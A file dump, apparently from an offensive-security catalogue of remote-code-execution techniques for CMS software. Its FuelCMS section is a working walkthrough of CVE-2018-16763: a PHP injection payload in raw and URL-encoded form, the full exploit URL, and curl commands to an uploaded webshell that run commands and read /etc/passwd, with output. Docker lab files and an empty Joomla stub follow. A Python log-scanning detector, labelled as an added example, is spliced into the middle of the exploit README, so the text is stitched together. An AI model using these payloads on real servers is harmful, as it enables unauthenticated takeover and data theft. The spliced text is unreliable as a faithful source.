168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 
195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 227 | 228 | # Include generic snippets of statements 229 | IncludeOptional conf-enabled/*.conf 230 | 231 | # Include the virtual host configurations: 232 | IncludeOptional sites-enabled/*.conf 233 | 234 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 235 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/README.md: -------------------------------------------------------------------------------- 1 | # FuelCMS 2 | 3 | FUEL CMS is a CodeIgniter based content management system. 
4 | 5 | - https://www.getfuelcms.com/ 6 | 7 | ## Techniques to achieve RCE on FuelCMS 8 | 9 | ### Version specific 10 | 11 | - [CVE-2018-16763 Version <= 1.4.1](techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/README.md) 12 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/README.md: -------------------------------------------------------------------------------- 1 | # FuelCMS - CVE-2018-16763 - Pre-Auth Remote Code Execution 2 | 3 | ## Requirements 4 | 5 | - FuelCMS version <= 1.4.1 6 | - Unauthenticated. 7 | 8 | ## Exploitation 9 | 10 | ### Download the exploit 11 | 12 | You can find the exploit code for this CVE here: [https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE) 13 | 14 | ### Step 1: Upload the webshell plugin 15 | 16 | First, you need to start the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) to execute commands and download remote files. It will use CVE-2018-16763 php code injection in the `filter` parameter to upload a php webshell API in FuelCMS using `file_put_contents`. 
The payload used is the following: 17 | 18 | ``` 19 | '+pi(print($a='file_put_contents'))+$a($_POST["d0eb3f9a"],$_POST["9bc30f43"])+' 20 | ``` 21 | 22 | This payload urlencoded gives: 23 | 24 | ``` 25 | %27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27 26 | ``` 27 | 28 | The final exploit URL is: 29 | 30 | ``` 31 | http://127.0.0.1:10080/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27 32 | ``` 33 | 34 | Now the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) performs a POST request to this URL to upload [./webshell/webshell.php](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/webshell/webshell.php) into Fuel CMS. 35 | 36 | ![](./.github/shell_autoupload.png) 37 | 38 | ### Step 2.1: Executing commands 39 | 40 | You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php with `action=exec&cmd=id`: 41 | 42 | ```sh 43 | $ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=exec&cmd=id" 44 | {"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"} 45 | ``` 46 | 47 | You can also access it by a GET request from a browser. 
48 | 49 | ### Step 2.2: Downloading files 50 | 51 | You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php with `action=download&cmd=/etc/passwd`: 52 | 53 | ```sh 54 | $ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=download&path=/etc/passwd" -o- 55 | root:x:0:0:root:/root:/bin/bash 56 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 57 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 58 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 59 | sync:x:4:65534:sync:/bin:/bin/sync 60 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 61 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 62 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 63 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 64 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 65 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 66 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 67 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 68 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 69 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 70 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 71 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 72 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 73 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 74 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 75 | ``` 76 | 77 | You can also download a remote file from a browser with a GET request. 78 | 79 | ### Step 3: The interactive console 80 | 81 | When your webshell is active, you can now use the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) to execute commands and download remote files. 
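The defender's counterpart to Steps 1 and 2, as an added example that is not part of this repository: a small Python scanner that reads Apache `combined`-format access-log lines (the LogFormat defined in the test_env apache2.conf) and flags the `filter` injection on `/fuel/pages/select/` quoted above, as well as requests to a PHP script that has appeared in the document root. The log lines are constructed, and the `ALLOWED_TOP_LEVEL_PHP` allowlist is an assumption about a stock FuelCMS webroot.

```python
"""Flag CVE-2018-16763 exploitation attempts in an Apache access log.

Added example, not code from the Awesome-RCE-techniques repository. It parses
the Debian "combined" LogFormat and applies two checks: PHP code injected into
the `filter` parameter of /fuel/pages/select/, and requests to a PHP file in
the document root other than the ones the application ships with.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Debian "combined" LogFormat:
#   %h %l %u %t "%r" %>s %O "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
    r'(?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The payload in the README closes the quoted string, concatenates with "+"
# and calls a PHP function: quote, operator, identifier, open parenthesis.
PHP_BREAKOUT_RE = re.compile(r"""['"]\s*[+.]\s*[A-Za-z_]\w*\s*\(""")
DANGEROUS_FUNCS = ("file_put_contents", "system", "exec", "passthru",
                   "shell_exec", "eval", "assert")

# Assumption: index.php is the only PHP script legitimately served from the
# FuelCMS document root, so a freshly dropped webshell shows up as another one.
ALLOWED_TOP_LEVEL_PHP = {"/index.php"}


def parse_combined(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return a reason string if the request target looks like abuse, else None."""
    parts = urlsplit(target)
    if parts.path.startswith("/fuel/pages/select"):
        # parse_qs percent-decodes once; unquote again so a double-encoded
        # payload is inspected in its fully decoded form as well.
        for value in parse_qs(parts.query).get("filter", []):
            decoded = unquote(value)
            if PHP_BREAKOUT_RE.search(decoded):
                return "php code in filter: " + decoded[:50]
            if any(re.search(r"\b%s\s*\(" % f, decoded) for f in DANGEROUS_FUNCS):
                return "dangerous function in filter: " + decoded[:50]
    if re.fullmatch(r"/[^/]+\.php", parts.path) and parts.path not in ALLOWED_TOP_LEVEL_PHP:
        return "unexpected top-level PHP script: " + parts.path
    return None


def scan(lines):
    """Return (client, target, reason) for every suspicious request in lines."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not combined format: skip rather than crash
        reason = classify_request(rec["target"])
        if reason:
            hits.append((rec["host"], rec["target"], reason))
    return hits


# Constructed sample: the README's exploit URL, a benign filter value, and a
# request to the webshell the exploit drops into the document root.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jun/2022:04:46:36 +0000] "GET /fuel/pages/select/?filter='
    '%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST'
    '%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27 HTTP/1.1" '
    '200 512 "-" "python-requests/2.27.1"',
    '10.0.0.7 - - [27/Jun/2022:04:47:01 +0000] "GET /fuel/pages/select/?filter=about '
    'HTTP/1.1" 200 341 "http://127.0.0.1:10080/fuel/pages" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Jun/2022:04:47:10 +0000] "POST /c1f3e834b49c4e548ebde7f596028f5b.php '
    'HTTP/1.1" 200 88 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for host, target, reason in scan(SAMPLE_LOG):
        print(f"{host} {reason} ({target[:40]}...)")
```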
82 | 83 | https://user-images.githubusercontent.com/79218792/171498197-2fb8a7bd-45b0-4fd7-86a1-9bb74aa31664.mp4 84 | 85 | ## References 86 | - https://www.getfuelcms.com/ 87 | - https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE 88 | - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 89 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/imgs/exploit_trigger.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/imgs/exploit_trigger.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "FuelCMS - CVE-2018-16763 - Pre-Auth Remote Code Execution", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.getfuelcms.com/", 6 | "https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE", 7 | "https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1" 8 | ] 9 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | ENV VERSION 1.4 4 | 5 | RUN apt-get -y -qq update \ 6 | && apt-get -y -qq install gnupg apt-transport-https lsb-release ca-certificates apache2 git curl unzip wget composer mariadb-client mariadb-server \ 7 | && wget -O /etc/apt/trusted.gpg.d/php.gpg 
https://packages.sury.org/php/apt.gpg \ 8 | && curl https://packages.sury.org/php/apt.gpg | apt-key add - \ 9 | && echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" > /etc/apt/sources.list.d/php.list \ 10 | && apt-get -y -qq update; apt-get -y -qq install php5.6 php5.6-mcrypt php5.6-mysql 11 | 12 | # Apache2 configuration + modules 13 | COPY ./files/apache2.conf /etc/apache2/apache2.conf 14 | RUN a2enmod rewrite 15 | 16 | # Installing the CMS 17 | RUN wget "https://codeload.github.com/daylightstudio/FUEL-CMS/tar.gz/refs/tags/${VERSION}" -O /tmp/fuelcms.tar.gz \ 18 | && rm /var/www/html/index.html \ 19 | && cd /tmp/ \ 20 | && tar xvf /tmp/fuelcms.tar.gz \ 21 | && rm -rf /var/www/html/ \ 22 | && mv /tmp/FUEL-CMS-${VERSION}/ /var/www/html 23 | 24 | RUN cd /var/www/html/ \ 25 | && composer install \ 26 | && sed -i "s/\$config\['admin_enabled'\] = FALSE;/\$config\['admin_enabled'\] = TRUE;/g" /var/www/html/fuel/application/config/MY_fuel.php 27 | 28 | # COPY ./files/.htaccess /var/www/html/.htaccess 29 | COPY ./files/database.php /var/www/html/fuel/application/config/database.php 30 | RUN chown www-data: -R /var/www/ 31 | 32 | # Create database fueldb and populate it 33 | RUN service mysql start && \ 34 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" && \ 35 | mysql -u root -e "CREATE DATABASE fuelcms; use fuelcms; source /var/www/html/fuel/install/fuel_schema.sql;" 36 | 37 | # Create the entrypoint script 38 | RUN echo "#!/bin/bash" > /entrypoint.sh && \ 39 | echo "service mysql start" >> /entrypoint.sh && \ 40 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh && \ 41 | chmod +x /entrypoint.sh 42 | 43 | RUN find /etc/php -type f -name "php.ini" -exec sed -i 's/^display_errors = Off$/display_errors = On/g' {} \; 44 | 45 | EXPOSE 80 46 | 47 | WORKDIR /var/www/html/ 48 | 49 | CMD /entrypoint.sh 50 | 
-------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_fuelcms 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | 3 | 4 | RewriteEngine On 5 | RewriteBase / 6 | 7 | 8 | Order Deny,Allow 9 | Deny From All 10 | 11 | 12 | # Allow asset folders through 13 | RewriteRule ^(fuel/modules/(.+)?/assets/(.+)) - [L] 14 | 15 | # Protect application and system files from being viewed 16 | RewriteRule ^(fuel/install/.+|fuel/crons/.+|fuel/data_backup/.+|fuel/codeigniter/.+|fuel/modules/.+|fuel/application/.+) - [F,L] 17 | 18 | 19 | RewriteCond %{REQUEST_FILENAME} !-f 20 | RewriteCond %{REQUEST_FILENAME} !-d 21 | 22 | RewriteRule .* index.php?/$0 [L] 23 | 24 | # Prevents access to dot files (.git, .htaccess) - security. 25 | RewriteCond %{SCRIPT_FILENAME} -d 26 | RewriteCond %{SCRIPT_FILENAME} -f 27 | RewriteRule "(^|/)\." 
- [F] 28 | 29 | 30 | Options -Indexes 31 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 
38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 
91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 
141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | 177 | 178 | # 179 | # Options Indexes FollowSymLinks 180 | # AllowOverride None 181 | # Require all granted 182 | # 183 | 184 | 185 | 186 | 187 | # AccessFileName: The name of the file to look for in each directory 188 | # for additional configuration directives. See also the AllowOverride 189 | # directive. 190 | # 191 | AccessFileName .htaccess 192 | 193 | # 194 | # The following lines prevent .htaccess and .htpasswd files from being 195 | # viewed by Web clients. 196 | # 197 | 198 | Require all denied 199 | 200 | 201 | 202 | # 203 | # The following directives define some format nicknames for use with 204 | # a CustomLog directive. 205 | # 206 | # These deviate from the Common Log Format definitions in that they use %O 207 | # (the actual bytes sent including headers) instead of %b (the size of the 208 | # requested file), because the latter makes it impossible to detect partial 209 | # requests. 
210 | # 211 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 212 | # Use mod_remoteip instead. 213 | # 214 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 215 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 216 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 217 | LogFormat "%{Referer}i -> %U" referer 218 | LogFormat "%{User-agent}i" agent 219 | 220 | # Include of directories ignores editors' and dpkg's backup files, 221 | # see README.Debian for details. 222 | 223 | # Include generic snippets of statements 224 | IncludeOptional conf-enabled/*.conf 225 | 226 | # Include the virtual host configurations: 227 | IncludeOptional sites-enabled/*.conf 228 | 229 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 230 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/database.php: -------------------------------------------------------------------------------- 1 | db->last_query() and profiling of DB queries. 62 | | When you run a query, with this setting set to TRUE (default), 63 | | CodeIgniter will store the SQL statement for debugging purposes. 64 | | However, this may cause high memory usage, especially if you run 65 | | a lot of SQL queries ... disable this to avoid that problem. 66 | | 67 | | The $active_group variable lets you choose which connection group to 68 | | make active. By default there is only one group (the 'default' group). 69 | | 70 | | The $query_builder variables lets you determine whether or not to load 71 | | the query builder class. 
72 | */ 73 | $active_group = 'default'; 74 | $query_builder = TRUE; 75 | 76 | $db['default'] = array( 77 | 'dsn' => '', 78 | 'hostname' => 'localhost', 79 | 'username' => 'db', 80 | 'password' => 'db', 81 | 'database' => 'fuelcms', 82 | 'dbdriver' => 'mysqli', 83 | 'dbprefix' => '', 84 | 'pconnect' => FALSE, 85 | 'db_debug' => (ENVIRONMENT !== 'production'), 86 | 'cache_on' => FALSE, 87 | 'cachedir' => '', 88 | 'char_set' => 'utf8', 89 | 'dbcollat' => 'utf8_general_ci', 90 | 'swap_pre' => '', 91 | 'encrypt' => FALSE, 92 | 'compress' => FALSE, 93 | 'stricton' => FALSE, 94 | 'failover' => array(), 95 | 'save_queries' => TRUE 96 | ); 97 | 98 | // used for testing purposes 99 | if (defined('TESTING')) 100 | { 101 | @include(TESTER_PATH.'config/tester_database'.EXT); 102 | } 103 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/README.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | 3 | Joomla, also spelled Joomla! and sometimes abbreviated as J!, is a free and open-source content management system for publishing web content on websites. Web content applications include discussion forums, photo galleries, e-Commerce and user communities and numerous other web-based applications. 4 | 5 | - https://www.joomla.org/ 6 | 7 | ## Techniques to achieve RCE on Joomla 8 | 9 | ### With admin credentials 10 | 11 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 12 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Joomla - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Joomla. 
6 | 7 | ## Exploitation 8 | 9 | 10 | ## References 11 | - -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Joomla - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [] 5 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update; \ 4 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 5 | 6 | RUN service mysql start;\ 7 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 8 | 9 | RUN wget 'https://downloads.joomla.org/cms/joomla4/4-1-3/Joomla_4-1-3-Stable-Full_Package.zip?format=zip' -O /tmp/Joomla.zip ;\ 10 | cd /var/www/html/; rm index.html; unzip /tmp/Joomla.zip 11 | 12 | RUN chown www-data: -R /var/www/ 13 | 14 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 15 | echo "service mysql start" >> /entrypoint.sh ;\ 16 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 17 | chmod +x /entrypoint.sh 18 | 19 | EXPOSE 80 20 | 21 | CMD /entrypoint.sh 22 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_joomla 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f 
Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 8080:8080 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 8080:8080 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/README.md: -------------------------------------------------------------------------------- 1 | # Content-Management-Systems-(CMS) 2 | 3 | ## Softwares 4 | 5 | - [**Drupal**: (3 techniques)](./Drupal/) 6 | - [**FuelCMS**: (1 technique)](./FuelCMS/) 7 | - [**Joomla**: (1 technique)](./Joomla/) 8 | - [**SweetRice**: (2 techniques)](./SweetRice/) 9 | - [**Typo3**: (1 technique)](./Typo3/) 10 | - [**Wordpress**: (3 techniques)](./Wordpress/) 11 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/README.md: -------------------------------------------------------------------------------- 1 | # SweetRice 2 | 3 | SweeRice is a simple website management system ,it is not just free and open source but provides popular functions such as SEO. It is enough for creating common blog or website, of course, You can also install plugins to extend it,this mode can be very flexible in different stages of site's development. 
